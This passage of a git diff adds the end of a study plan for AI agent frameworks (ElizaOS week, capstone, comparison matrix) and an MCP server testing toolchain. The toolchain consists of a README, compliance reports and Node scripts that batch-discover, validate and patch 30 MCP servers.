**runtime.ts** — How does the AgentRuntime process an incoming message? What's the evaluation pipeline? + - **types.ts** — What are all the interfaces? How extensible is the system? + - **memory.ts** — How is conversation history stored and retrieved? What's the embedding strategy? +- Study advanced patterns: + - Multi-agent setups — can you run multiple agents with different characters? + - Custom evaluators — how do you add post-processing logic? + - Custom providers — how do you inject context into every agent response? +- Compare deployment architecture decisions: + - How does ElizaOS handle rate limiting across platforms? + - How does it handle platform-specific message formatting (embeds, buttons, etc.)? + - What's the error handling strategy when a platform adapter fails? + +**Homework:** +- [ ] Write a "What I'd Steal From ElizaOS" doc — which patterns are worth using in your own projects? Think: + - Character file abstraction for agent personality + - Plugin registration pattern + - Platform adapter interface + - Memory routing across services +- [ ] Identify the 3 biggest architectural weaknesses (every framework has them) + +--- + +### Day 5 (Friday): Integration Project — Deploy a Week 1-6 Agent + +**The real test:** Take an agent you built in Weeks 1-6 and deploy it to at least one chat platform using patterns learned from ElizaOS. + +**Options (pick one):** +1. **Pydantic-AI agent → Discord:** Take your structured-output agent from Week 1 and wrap it in a Discord bot using ElizaOS's adapter patterns (or build your own minimal adapter inspired by their architecture) +2. **GPT Researcher → Telegram:** Take your research agent from Week 4 and make it accessible via Telegram — users send a topic, agent researches and responds +3. **Multi-framework pipeline → Discord:** Take your Week 6 MetaGPT multi-agent setup and expose it through a Discord interface where users can kick off the SOP workflow + +**Homework:** +- [ ] Deploy a previously-built agent to a real chat platform — it must respond to real messages +- [ ] Write a retrospective for ElizaOS: + - **Strengths:** What does it do better than building your own deployment layer? + - **Weaknesses:** Where is it limited or frustrating? + - **When to use:** What type of project benefits most from ElizaOS? + - **When to skip:** When is it overkill or the wrong tool? +- [ ] Update the comparison matrix with the ElizaOS column +- [ ] Answer: "If I were building a production agent for a client, would I use ElizaOS for deployment or roll my own? Why?" + +### Key Questions You Should Be Able to Answer After Week 7 + +1. How does ElizaOS's character system differ from hardcoding agent personalities? +2. What's the plugin registration lifecycle — from `Plugin` definition to runtime availability? +3. How would you add a completely new platform (e.g., Slack, WhatsApp) to ElizaOS? +4. What are the trade-offs of a deployment-platform approach vs building bespoke platform integrations? +5. How does multi-platform memory work — and where does it break down? +6. When is ElizaOS the right choice vs a simple Discord.js bot? +7. What deployment patterns from ElizaOS would you steal for a custom agent pipeline? + +--- + +## Week 8: Capstone Project + +> **Timeline:** 1 week | **Difficulty:** ⭐⭐⭐⭐⭐ | **Goal:** Synthesize learnings from 3+ frameworks + +### The Project: "Research → Analyze → Act" Pipeline + +Build a system that combines at least 3 of the frameworks you studied: + +#### Recommended Architecture + +``` +┌─────────────────────────────────────────────────────────┐ +│ Capstone Pipeline │ +│ │ +│ ┌──────────────┐ ┌──────────────┐ ┌────────────┐ │ +│ │ GPT │ │ Pydantic-AI │ │ MetaGPT OR │ │ +│ │ Researcher │───▶│ Structured │───▶│ MS Agent │ │ +│ │ (Research) │ │ Analysis │ │ Framework │ │ +│ │ │ │ Agent │ │ (Execute) │ │ +│ └──────────────┘ └──────────────┘ └────────────┘ │ +│ │ +│ Optional additions: │ +│ - Agent-S for browser automation during research │ +│ - Yao for scheduling periodic re-research │ +└─────────────────────────────────────────────────────────┘ +``` + +#### Requirements + +- [ ] **Stage 1: Research** — Use GPT Researcher to conduct deep research on a topic +- [ ] **Stage 2: Analysis** — Use Pydantic-AI to process research into structured data with validated output types +- [ ] **Stage 3: Action** — Use MetaGPT's multi-agent SOP OR MS Agent Framework's graph workflow to generate deliverables from the structured analysis +- [ ] **Integration:** The output of one stage must be the input to the next +- [ ] **Documentation:** Write a README explaining your architecture and design decisions + +#### Stretch Goals + +- [ ] Add a Yao scheduled trigger so the pipeline runs daily/weekly +- [ ] Deploy the entire pipeline to Discord/Telegram using ElizaOS patterns from Week 7 +- [ ] Add observability (Logfire or OpenTelemetry) +- [ ] Add a web UI (even simple HTML) +- [ ] Use MCP to connect components +- [ ] Add Agent-S for any browser automation steps + +#### Deliverables + +- [ ] Working code at `~/agent-study/capstone/` +- [ ] `README.md` with architecture diagram and setup instructions +- [ ] `DECISIONS.md` explaining why you chose each framework for each stage +- [ ] `RETROSPECTIVE.md` — final thoughts on the 7-week journey + +#### Suggested Topics for the Pipeline + +1. **Competitor Analysis Tool** — Research competitors → Structure findings → Generate strategic recommendations +2. **Daily News Briefing** — Research trending topics → Analyze relevance → Generate personalized newsletter +3. **Technical Due Diligence** — Research a technology → Structured pros/cons → Multi-perspective report (architect, PM, engineer roles) +4. **Market Research Report** — Research a market → Structured data extraction → Executive summary + detailed report + +--- + +## Appendix: Comparison Matrix Template + +Save this at `~/agent-study/comparison-matrix/matrix.md` and fill it in weekly: + +```markdown +# AI Agent Framework Comparison Matrix + +| Dimension | Pydantic-AI | MS Agent Framework | Agent-S | GPT Researcher | Yao | MetaGPT | ElizaOS | +|-----------|-------------|-------------------|---------|----------------|-----|---------|---------| +| **Language** | Python | Python + .NET | Python | Python | Go | Python | TypeScript | +| **Stars** | 14.6k | 7k | 9.6k | 25k | 7.5k | 63k | 17k | +| **Agent Definition** | | | | | | | | +| **Tool Integration** | | | | | | | | +| **Multi-Agent Coord.** | | | | | | | | +| **Error Handling** | | | | | | | | +| **Observability** | | | | | | | | +| **Type Safety** | | | | | | | | +| **DX / Ergonomics** | | | | | | | | +| **Production Readiness** | | | | | | | | +| **Unique Superpower** | | | | | | | | +| **Biggest Weakness** | | | | | | | | +| **Best Use Case** | | | | | | | | +| **Would I Use For...** | | | | | | | | +| **Overall Rating (1-10)** | | | | | | | | +``` + +--- + +## 📊 Week-by-Week Schedule Overview + +| Week | Framework | Focus | Difficulty | Key Deliverables | +|------|-----------|-------|------------|------------------| +| 0 | Prep | Setup & background reading | ⭐ | Environment ready, papers skimmed | +| 1 | Pydantic-AI | Type-safe agents, DI, structured output | ⭐⭐ | Architecture doc, 3 agents, steal doc | +| 2 | MS Agent Framework | Graph workflows, DevUI, enterprise patterns | ⭐⭐⭐ | Graph workflow, DevUI screenshots, steal doc | +| 3 | Agent-S | Computer use, visual grounding, screenshots | ⭐⭐⭐⭐ | Computer use demo, architecture analysis | +| 4 | GPT Researcher | Deep research, Plan-and-Solve, RAG | ⭐⭐ | Research agent, MCP integration | +| 5 | Yao | Event-driven agents, Go, single binary, GraphRAG | ⭐⭐⭐⭐ | Event-driven agent, DSL exploration | +| 6 | MetaGPT | SOPs, multi-agent teams, roles/actions | ⭐⭐⭐ | Multi-agent SOP, comparison matrix | +| 7 | ElizaOS | Deployment, multi-platform distribution, plugins | ⭐⭐ | Multi-platform agent, custom plugin, deploy a Week 1-6 agent | +| 8 | Capstone | Integrate 3+ frameworks | ⭐⭐⭐⭐⭐ | Working pipeline, docs, retrospective | + +--- + +## 🏁 Success Criteria + +After completing this study plan, you should be able to: + +1. **Explain** the architecture of each framework from memory (whiteboard test) +2. **Build** a production-grade agent with Pydantic-AI from scratch +3. **Design** a graph workflow for a complex multi-step process +4. **Understand** computer-use agent architecture and its limitations +5. **Implement** a Plan-and-Solve research pipeline +6. **Compare** event-driven vs request-response agent architectures +7. **Deploy** an agent to Discord/Telegram and understand multi-platform routing patterns +8. **Choose** the right framework for a given problem with clear reasoning +9. **Read** any agent framework's source code and quickly identify its core abstractions + +> *"The goal isn't to memorize APIs. It's to build intuition for how agent systems are designed, so you can build your own or extend existing ones with confidence."* + +--- + +*Generated by Clawdbot | February 4, 2026* diff --git a/factory-tools/README.md b/factory-tools/README.md new file mode 100644 index 0000000..2849e42 --- /dev/null +++ b/factory-tools/README.md @@ -0,0 +1,105 @@ +# MCP Factory Tools + +Toolchain for building, testing, validating, and shipping MCP servers at scale. + +## What's Installed + +### Testing & Validation +| Tool | Type | Purpose | +|------|------|---------| +| **mcp-jest** (global CLI) | npm | Discover tools, generate tests, validate protocol compliance, watch mode | +| **mcp-validator** (Janix-ai) | Python (cloned) | Formal MCP protocol compliance reports (2024-11-05 → 2025-06-18) | +| **MCP Inspector** (official) | Cloned | Visual web UI for interactive server debugging | + +### Development +| Tool | Type | Purpose | +|------|------|---------| +| **FastMCP** (npm) | Library | Opinionated TS framework for building new MCP servers fast | +| **mcp-add** (global CLI) | npm | One-liner install for customers to add servers to any MCP client | + +## Quick Commands + +### Discover all tools across 30 servers +```bash +cd factory-tools && node scripts/discover-all.mjs +``` +Generates test configs in `test-configs/` for every server. + +### Validate all servers for MCP compliance +```bash +cd factory-tools && node scripts/validate-all.mjs +``` +Produces compliance reports in `reports/` (JSON + Markdown). + +### Validate a single server +```bash +mcp-jest validate --config test-configs/calendly.json +``` + +### Discover a single server's tools +```bash +mcp-jest discover --config test-configs/calendly.json +``` + +### Run tests against a server (requires real API keys) +```bash +# Edit test-configs/calendly.json to add real CALENDLY_API_KEY +mcp-jest --config test-configs/calendly-tests.json +``` + +### Compliance report via mcp-validator (Python) +```bash +cd mcp-validator && source .venv/bin/activate +python -m mcp_testing.scripts.compliance_report \ + --server-command "node ../mcp-diagrams/mcp-servers/calendly/dist/index.js" \ + --protocol-version 2025-06-18 +``` + +## Directory Structure +``` +factory-tools/ +├── README.md +├── package.json +├── server-registry.json # All 30 servers, their env vars +├── scripts/ +│ ├── discover-all.mjs # Batch discovery +│ ├── validate-all.mjs # Batch validation +│ └── fix-unknown-tool-error.mjs # Template-level bug fix (already applied) +├── test-configs/ # Generated per-server test configs +│ ├── calendly.json # Base config (for discover/validate) +│ └── calendly-tests.json # Full test suite (for testing) +├── reports/ # Compliance & discovery reports +├── mcp-validator/ # Cloned: Python compliance testing +├── mcp-inspector/ # Cloned: Visual debugging UI +└── node_modules/ # fastmcp, mcp-jest (local) +``` + +## Server Status (as of 2026-02-04) +- **30 servers**, **243 tools** +- **702 test cases** auto-generated +- **100/100 compliance** (all servers FULL compliant after bug fix) +- Bug fixed: Unknown tool error handling (McpError + ErrorCode.MethodNotFound) + +## For New Servers (use FastMCP) +```typescript +import { FastMCP } from "fastmcp"; +import { z } from "zod"; + +const server = new FastMCP({ name: "My Server", version: "1.0.0" }); + +server.addTool({ + name: "my_tool", + description: "Does a thing", + parameters: z.object({ input: z.string() }), + execute: async (args) => String(result), +}); + +server.start({ transportType: "stdio" }); +``` + +## For Customer Install Docs +```bash +npx mcp-add --name calendly --type local \ + --command "npx mcp-server-calendly" \ + --scope global --clients "claude,cursor,vscode" +``` diff --git a/factory-tools/mcp-inspector b/factory-tools/mcp-inspector new file mode 160000 index 0000000..dd02737 --- /dev/null +++ b/factory-tools/mcp-inspector @@ -0,0 +1 @@ +Subproject commit dd027374636888a830bc22f389ccabcfc7fa7af2 diff --git a/factory-tools/mcp-validator b/factory-tools/mcp-validator new file mode 160000 index 0000000..bb099dd --- /dev/null +++ b/factory-tools/mcp-validator @@ -0,0 +1 @@ +Subproject commit bb099ddc3b9d9564e13d138d5378705657566706 diff --git a/factory-tools/package.json b/factory-tools/package.json new file mode 100644 index 0000000..b0c51b0 --- /dev/null +++ b/factory-tools/package.json @@ -0,0 +1,16 @@ +{ + "name": "mcp-factory-tools", + "version": "1.0.0", + "description": "MCP Factory toolchain — testing, validation, scaffolding", + "private": true, + "scripts": { + "test:all": "node scripts/test-all-servers.mjs", + "validate:all": "node scripts/validate-all-servers.mjs", + "report": "node scripts/generate-report.mjs" + }, + "type": "module", + "dependencies": { + "fastmcp": "^3.31.0", + "mcp-jest": "^1.2.1" + } +} diff --git a/factory-tools/reports/compliance-2026-02-05.json b/factory-tools/reports/compliance-2026-02-05.json new file mode 100644 index 0000000..d35abe9 --- /dev/null +++ b/factory-tools/reports/compliance-2026-02-05.json @@ -0,0 +1,194 @@ +{ + "date": "2026-02-05T01:09:13.163Z", + "summary": { + "total": 30, + "validated": 30, + "avgScore": 100, + "perfect": 30, + "good": 0, + "needsWork": 0 + }, + "commonIssues": [], + "servers": [ + { + "name": "acuity-scheduling", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "bamboohr", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "basecamp", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "bigcommerce", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "brevo", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "calendly", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "clickup", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "close", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "clover", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "constant-contact", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "fieldedge", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "freshbooks", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "freshdesk", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "gusto", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "helpscout", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "housecall-pro", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "jobber", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "keap", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "lightspeed", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "mailchimp", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "pipedrive", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "rippling", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "servicetitan", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "squarespace", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "toast", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "touchbistro", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "trello", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "wave", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "wrike", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "zendesk", + "score": 100, + "level": "FULL", + "issues": [] + } + ] +} \ No newline at end of file diff --git a/factory-tools/reports/compliance-2026-02-05.md b/factory-tools/reports/compliance-2026-02-05.md new file mode 100644 index 0000000..cac090e --- /dev/null +++ b/factory-tools/reports/compliance-2026-02-05.md @@ -0,0 +1,37 @@ +# MCP Factory Compliance Report + +**Date:** 2/4/2026 +**Average Score:** 100/100 + +| Server | Score | Level | Issues | +|--------|-------|-------|--------| +| 🟢 acuity-scheduling | 100/100 | FULL | None | +| 🟢 bamboohr | 100/100 | FULL | None | +| 🟢 basecamp | 100/100 | FULL | None | +| 🟢 bigcommerce | 100/100 | FULL | None | +| 🟢 brevo | 100/100 | FULL | None | +| 🟢 calendly | 100/100 | FULL | None | +| 🟢 clickup | 100/100 | FULL | None | +| 🟢 close | 100/100 | FULL | None | +| 🟢 clover | 100/100 | FULL | None | +| 🟢 constant-contact | 100/100 | FULL | None | +| 🟢 fieldedge | 100/100 | FULL | None | +| 🟢 freshbooks | 100/100 | FULL | None | +| 🟢 freshdesk | 100/100 | FULL | None | +| 🟢 gusto | 100/100 | FULL | None | +| 🟢 helpscout | 100/100 | FULL | None | +| 🟢 housecall-pro | 100/100 | FULL | None | +| 🟢 jobber | 100/100 | FULL | None | +| 🟢 keap | 100/100 | FULL | None | +| 🟢 lightspeed | 100/100 | FULL | None | +| 🟢 mailchimp | 100/100 | FULL | None | +| 🟢 pipedrive | 100/100 | FULL | None | +| 🟢 rippling | 100/100 | FULL | None | +| 🟢 servicetitan | 100/100 | FULL | None | +| 🟢 squarespace | 100/100 | FULL | None | +| 🟢 toast | 100/100 | FULL | None | +| 🟢 touchbistro | 100/100 | FULL | None | +| 🟢 trello | 100/100 | FULL | None | +| 🟢 wave | 100/100 | FULL | None | +| 🟢 wrike | 100/100 | FULL | None | +| 🟢 zendesk | 100/100 | FULL | None | diff --git a/factory-tools/reports/discovery-2026-02-05.json b/factory-tools/reports/discovery-2026-02-05.json new file mode 100644 index 0000000..04a0b4e --- /dev/null +++ b/factory-tools/reports/discovery-2026-02-05.json @@ -0,0 +1,126 @@ +{ + "passed": [ + { + "name": "acuity-scheduling", + "tools": 16 + }, + { + "name": "bamboohr", + "tools": 12 + }, + { + "name": "basecamp", + "tools": 14 + }, + { + "name": "bigcommerce", + "tools": 31 + }, + { + "name": "brevo", + "tools": 25 + }, + { + "name": "calendly", + "tools": 15 + }, + { + "name": "clickup", + "tools": 22 + }, + { + "name": "close", + "tools": 46 + }, + { + "name": "clover", + "tools": 23 + }, + { + "name": "constant-contact", + "tools": 27 + }, + { + "name": "fieldedge", + "tools": 30 + }, + { + "name": "freshbooks", + "tools": 26 + }, + { + "name": "freshdesk", + "tools": 25 + }, + { + "name": "gusto", + "tools": 9 + }, + { + "name": "helpscout", + "tools": 23 + }, + { + "name": "housecall-pro", + "tools": 22 + }, + { + "name": "jobber", + "tools": 24 + }, + { + "name": "keap", + "tools": 32 + }, + { + "name": "lightspeed", + "tools": 32 + }, + { + "name": "mailchimp", + "tools": 15 + }, + { + "name": "pipedrive", + "tools": 31 + }, + { + "name": "rippling", + "tools": 21 + }, + { + "name": "servicetitan", + "tools": 23 + }, + { + "name": "squarespace", + "tools": 18 + }, + { + "name": "toast", + "tools": 19 + }, + { + "name": "touchbistro", + "tools": 21 + }, + { + "name": "trello", + "tools": 34 + }, + { + "name": "wave", + "tools": 23 + }, + { + "name": "wrike", + "tools": 22 + }, + { + "name": "zendesk", + "tools": 21 + } + ], + "failed": [], + "total": 30 +} \ No newline at end of file diff --git a/factory-tools/scripts/discover-all.mjs b/factory-tools/scripts/discover-all.mjs new file mode 100644 index 0000000..7cd8a04 --- /dev/null +++ b/factory-tools/scripts/discover-all.mjs @@ -0,0 +1,107 @@ +#!/usr/bin/env node +/** + * MCP Factory — Batch Discovery + * Runs mcp-jest discover on all 30 servers, generates test configs. + * Uses dummy env vars so servers start without real API keys. + */ + +import { readFileSync, writeFileSync, mkdirSync, existsSync } from 'fs'; +import { execSync } from 'child_process'; +import { resolve, dirname } from 'path'; +import { fileURLToPath } from 'url'; + +const __dirname = dirname(fileURLToPath(import.meta.url)); +const FACTORY_ROOT = resolve(__dirname, '..'); +const registry = JSON.parse(readFileSync(resolve(FACTORY_ROOT, 'server-registry.json'), 'utf-8')); +const SERVERS_ROOT = resolve(FACTORY_ROOT, registry.servers_root); + +// Output dirs +const CONFIGS_DIR = resolve(FACTORY_ROOT, 'test-configs'); +const REPORTS_DIR = resolve(FACTORY_ROOT, 'reports'); +mkdirSync(CONFIGS_DIR, { recursive: true }); +mkdirSync(REPORTS_DIR, { recursive: true }); + +const results = { passed: [], failed: [], total: 0 }; + +for (const [name, meta] of Object.entries(registry.servers)) { + results.total++; + const serverDir = resolve(SERVERS_ROOT, name); + const distEntry = resolve(serverDir, 'dist/index.js'); + + if (!existsSync(distEntry)) { + console.log(`⚠️ ${name}: No dist/index.js — needs build`); + results.failed.push({ name, reason: 'no dist' }); + continue; + } + + // Build env object with dummy values + const env = {}; + for (const envVar of meta.env) { + env[envVar] = 'factory_discovery_dummy'; + } + + // Create test config + const config = { + server: { + command: 'node', + args: [distEntry], + env + } + }; + + const configPath = resolve(CONFIGS_DIR, `${name}.json`); + writeFileSync(configPath, JSON.stringify(config, null, 2)); + + try { + console.log(`🔍 Discovering ${name}...`); + const output = execSync(`mcp-jest discover --config "${configPath}"`, { + timeout: 30000, + encoding: 'utf-8', + cwd: CONFIGS_DIR, + stdio: ['pipe', 'pipe', 'pipe'] + }); + + // Move generated config + const generatedPath = resolve(CONFIGS_DIR, 'mcp-jest.generated.json'); + if (existsSync(generatedPath)) { + const generated = JSON.parse(readFileSync(generatedPath, 'utf-8')); + // Merge env into generated config + generated.server.env = env; + writeFileSync(resolve(CONFIGS_DIR, `${name}-tests.json`), JSON.stringify(generated, null, 2)); + execSync(`rm "${generatedPath}"`); + + const toolCount = Object.keys(generated.tests?.tools || {}).length; + console.log(` ✅ ${name}: ${toolCount} test cases generated`); + results.passed.push({ name, tools: toolCount }); + } + } catch (err) { + const stderr = err.stderr?.toString() || err.message; + console.log(` ❌ ${name}: ${stderr.split('\n')[0]}`); + results.failed.push({ name, reason: stderr.split('\n')[0] }); + } +} + +// Summary +console.log('\n' + '═'.repeat(60)); +console.log(' MCP FACTORY — DISCOVERY REPORT'); +console.log('═'.repeat(60)); +console.log(`\nTotal: ${results.total}`); +console.log(`Passed: ${results.passed.length}`); +console.log(`Failed: ${results.failed.length}`); + +if (results.passed.length > 0) { + const totalTools = results.passed.reduce((sum, r) => sum + r.tools, 0); + console.log(`\nTotal test cases generated: ${totalTools}`); +} + +if (results.failed.length > 0) { + console.log('\nFailed servers:'); + for (const f of results.failed) { + console.log(` - ${f.name}: ${f.reason}`); + } +} + +// Write report +const reportPath = resolve(REPORTS_DIR, `discovery-${new Date().toISOString().split('T')[0]}.json`); +writeFileSync(reportPath, JSON.stringify(results, null, 2)); +console.log(`\nReport saved: ${reportPath}`); diff --git a/factory-tools/scripts/fix-unknown-tool-error.mjs b/factory-tools/scripts/fix-unknown-tool-error.mjs new file mode 100644 index 0000000..16860df --- /dev/null +++ b/factory-tools/scripts/fix-unknown-tool-error.mjs @@ -0,0 +1,125 @@ +#!/usr/bin/env node +/** + * MCP Factory — Fix Unknown Tool Error + * Patches all 30 servers to properly throw McpError for unknown tools + * instead of catching and returning isError:true (which MCP spec treats as success). + * + * The fix: + * 1. Import McpError and ErrorCode from the SDK + * 2. Check tool name against known tools before calling handler + * 3. Throw McpError(ErrorCode.MethodNotFound) for unknown tools + */ + +import { readFileSync, writeFileSync, readdirSync, existsSync } from 'fs'; +import { execSync } from 'child_process'; +import { resolve, dirname } from 'path'; +import { fileURLToPath } from 'url'; + +const __dirname = dirname(fileURLToPath(import.meta.url)); +const FACTORY_ROOT = resolve(__dirname, '..'); +const registry = JSON.parse(readFileSync(resolve(FACTORY_ROOT, 'server-registry.json'), 'utf-8')); +const SERVERS_ROOT = resolve(FACTORY_ROOT, registry.servers_root); + +let fixed = 0; +let skipped = 0; +let errors = 0; + +for (const [name] of Object.entries(registry.servers)) { + const srcPath = resolve(SERVERS_ROOT, name, 'src/index.ts'); + + if (!existsSync(srcPath)) { + console.log(`⚠️ ${name}: No src/index.ts`); + skipped++; + continue; + } + + let src = readFileSync(srcPath, 'utf-8'); + + // Check if already fixed + if (src.includes('McpError')) { + console.log(`⏭️ ${name}: Already has McpError import`); + skipped++; + continue; + } + + try { + // Step 1: Add McpError and ErrorCode to imports + // Find the import from types.js + const typesImportMatch = src.match(/(import\s*\{[^}]*\}\s*from\s*"@modelcontextprotocol\/sdk\/types\.js";)/); + if (typesImportMatch) { + const oldImport = typesImportMatch[1]; + // Extract existing imports + const existingImports = oldImport.match(/\{([^}]+)\}/)[1].trim(); + const newImport = oldImport.replace( + `{${existingImports}}`, + `{${existingImports}, McpError, ErrorCode}` + ); + src = src.replace(oldImport, newImport); + } + + // Step 2: Add tool name validation before the try/catch in CallToolRequestSchema handler + // Pattern: Find the handler and add a check + const toolNames = [...src.matchAll(/name:\s*"([^"]+)"/g)].map(m => m[1]); + // Filter to only tool names (in the tools array, not other name fields) + const validToolNames = toolNames.filter(n => !['text', 'object'].includes(n)); + + // Find the CallToolRequestSchema handler and add validation + const handlerPattern = /server\.setRequestHandler\(CallToolRequestSchema,\s*async\s*\(request\)\s*=>\s*\{\s*const\s*\{\s*name,\s*arguments:\s*args\s*\}\s*=\s*request\.params;\s*\n\s*try\s*\{/; + + if (handlerPattern.test(src)) { + src = src.replace( + handlerPattern, + `server.setRequestHandler(CallToolRequestSchema, async (request) => { + const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, \`Unknown tool: \${name}\`); + } + + try {` + ); + } else { + // Try a more flexible pattern + const altPattern = /server\.setRequestHandler\(CallToolRequestSchema,\s*async\s*\(request\)\s*=>\s*\{/; + if (altPattern.test(src)) { + // Check if there's already a tool validation + const handlerBlock = src.substring(src.search(altPattern)); + if (handlerBlock.includes('const { name') && !handlerBlock.includes('knownTools')) { + // Insert after the destructuring + src = src.replace( + /const\s*\{\s*name,\s*arguments:\s*args\s*\}\s*=\s*request\.params;\s*\n/, + `const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, \`Unknown tool: \${name}\`); + } + +` + ); + } + } + } + + writeFileSync(srcPath, src); + console.log(`✅ ${name}: Patched`); + fixed++; + + // Rebuild + try { + execSync('npm run build', { cwd: resolve(SERVERS_ROOT, name), timeout: 15000, stdio: 'pipe' }); + console.log(` 🔨 ${name}: Rebuilt`); + } catch (buildErr) { + console.log(` ⚠️ ${name}: Build warning (check manually)`); + } + } catch (err) { + console.log(`❌ ${name}: ${err.message}`); + errors++; + } +} + +console.log('\n' + '═'.repeat(60)); +console.log(`Fixed: ${fixed} | Skipped: ${skipped} | Errors: ${errors}`); diff --git a/factory-tools/scripts/validate-all.mjs b/factory-tools/scripts/validate-all.mjs new file mode 100644 index 0000000..a6ef974 --- /dev/null +++ b/factory-tools/scripts/validate-all.mjs @@ -0,0 +1,127 @@ +#!/usr/bin/env node +/** + * MCP Factory — Batch Protocol Validation + * Runs mcp-jest validate on all 30 servers, collects compliance scores. + */ + +import { readFileSync, writeFileSync, mkdirSync, existsSync } from 'fs'; +import { execSync } from 'child_process'; +import { resolve, dirname } from 'path'; +import { fileURLToPath } from 'url'; + +const __dirname = dirname(fileURLToPath(import.meta.url)); +const FACTORY_ROOT = resolve(__dirname, '..'); +const registry = JSON.parse(readFileSync(resolve(FACTORY_ROOT, 'server-registry.json'), 'utf-8')); +const SERVERS_ROOT = resolve(FACTORY_ROOT, registry.servers_root); + +const CONFIGS_DIR = resolve(FACTORY_ROOT, 'test-configs'); +const REPORTS_DIR = resolve(FACTORY_ROOT, 'reports'); +mkdirSync(REPORTS_DIR, { recursive: true }); + +const results = []; +let totalScore = 0; + +for (const [name, meta] of Object.entries(registry.servers)) { + const configPath = resolve(CONFIGS_DIR, `${name}.json`); + + if (!existsSync(configPath)) { + console.log(`⚠️ ${name}: No config — run discover first`); + results.push({ name, score: null, level: 'SKIPPED', issues: ['No config file'] }); + continue; + } + + try { + console.log(`🔬 Validating ${name}...`); + const output = execSync(`mcp-jest validate --config "${configPath}" 2>&1`, { + timeout: 30000, + encoding: 'utf-8', + stdio: ['pipe', 'pipe', 'pipe'] + }); + + // Parse score from output + const scoreMatch = output.match(/Score:\s*(\d+)\/100/); + const levelMatch = output.match(/Level:\s*(\S+)/); + const failedTests = [...output.matchAll(/❌\s*\[(\w+)\s*\]\s*(.+)/g)].map(m => m[2].trim()); + + const score = scoreMatch ? parseInt(scoreMatch[1]) : null; + const level = levelMatch ? levelMatch[1] : 'UNKNOWN'; + + totalScore += score || 0; + results.push({ name, score, level, issues: failedTests }); + + const emoji = score >= 95 ? '🟢' : score >= 80 ? '🟡' : '🔴'; + console.log(` ${emoji} ${name}: ${score}/100 (${level}) ${failedTests.length > 0 ? '— ' + failedTests.length + ' issue(s)' : ''}`); + } catch (err) { + // mcp-jest validate exits with code 1 for non-compliant, but still has output + const output = err.stdout?.toString() || err.stderr?.toString() || ''; + + const scoreMatch = output.match(/Score:\s*(\d+)\/100/); + const levelMatch = output.match(/Level:\s*(\S+)/); + const failedTests = [...output.matchAll(/❌\s*\[(\w+)\s*\]\s*(.+)/g)].map(m => m[2].trim()); + + const score = scoreMatch ? parseInt(scoreMatch[1]) : 0; + const level = levelMatch ? levelMatch[1] : 'ERROR'; + + totalScore += score; + results.push({ name, score, level, issues: failedTests.length > 0 ? failedTests : [output.split('\n')[0]] }); + + const emoji = score >= 95 ? '🟢' : score >= 80 ? '🟡' : '🔴'; + console.log(` ${emoji} ${name}: ${score}/100 (${level}) ${failedTests.length > 0 ? '— ' + failedTests.length + ' issue(s)' : ''}`); + } +} + +// Summary +const validResults = results.filter(r => r.score !== null); +const avgScore = validResults.length > 0 ? Math.round(totalScore / validResults.length) : 0; +const perfect = validResults.filter(r => r.score >= 95).length; +const good = validResults.filter(r => r.score >= 80 && r.score < 95).length; +const needsWork = validResults.filter(r => r.score < 80).length; + +console.log('\n' + '═'.repeat(60)); +console.log(' MCP FACTORY — COMPLIANCE REPORT'); +console.log('═'.repeat(60)); +console.log(`\nServers validated: ${validResults.length}/${results.length}`); +console.log(`Average score: ${avgScore}/100`); +console.log(`🟢 Compliant (95+): ${perfect}`); +console.log(`🟡 Near (80-94): ${good}`); +console.log(`🔴 Needs work (<80): ${needsWork}`); + +// Common issues +const allIssues = results.flatMap(r => r.issues); +const issueFreq = {}; +for (const issue of allIssues) { + issueFreq[issue] = (issueFreq[issue] || 0) + 1; +} +const sortedIssues = Object.entries(issueFreq).sort((a, b) => b[1] - a[1]); + +if (sortedIssues.length > 0) { + console.log('\nMost common issues:'); + for (const [issue, count] of sortedIssues.slice(0, 5)) { + console.log(` ${count}x — ${issue}`); + } +} + +// Write report +const report = { + date: new Date().toISOString(), + summary: { total: results.length, validated: validResults.length, avgScore, perfect, good, needsWork }, + commonIssues: sortedIssues, + servers: results +}; + +const reportPath = resolve(REPORTS_DIR, `compliance-${new Date().toISOString().split('T')[0]}.json`); +writeFileSync(reportPath, JSON.stringify(report, null, 2)); + +// Also write markdown +let md = `# MCP Factory Compliance Report\n\n`; +md += `**Date:** ${new Date().toLocaleDateString()}\n`; +md += `**Average Score:** ${avgScore}/100\n\n`; +md += `| Server | Score | Level | Issues |\n|--------|-------|-------|--------|\n`; +for (const r of results) { + const emoji = r.score >= 95 